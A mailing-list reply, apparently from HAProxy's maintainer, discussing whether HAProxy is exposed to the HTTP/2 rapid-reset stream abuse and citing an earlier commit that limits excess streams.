On Tue, Oct 10, 2023 at 03:49:21PM +0200, Willy Tarreau wrote:
> > Seems like a clever update to the "good old" h2 multiplexing abuse vectors:
> > 1. client opens a lot of H2 streams on a connection
> > 2. Spams some requests
> > 3. immediately sends h2 RST frames for all of them
> > 4. Go back to 1. repeat.
> 
> Yes, precisely one of those I tested last week among the usual approchaes
> consisting in creating tons of streams while staying within the protocol's
> validity limits. The only thing it did was to detect the pool issue I
> mentioned in the dev7 announce.
> 
> > The idea being to cause resource exhaustion on the server/proxy at least
> > when it allocates stream related buffers etc, and the underlying server too
> > since it likely sees the requests before they get cancelled.
> > 
> > Looking at HAProxy I'd like to know if someone's aware of a decent
> > mitigation option?
> 
> We first need to check if at all we're affected, since we keep a count
> of the attached streams for precisely this case and we refrain from
> processing headers frames when we have too many streams, so normally
> the mux will pause waiting for the upper layers to close.

So at first glance we indeed addressed this case in 2018 (1.9-dev)
with this commit:

  f210191dc ("BUG/MEDIUM: h2: don't accept new streams if conn_streams are 
still in excess")

It was incomplete by then an later refined, but the idea is there.
But I'll try to stress that area again to see.

Willy

Reply via email to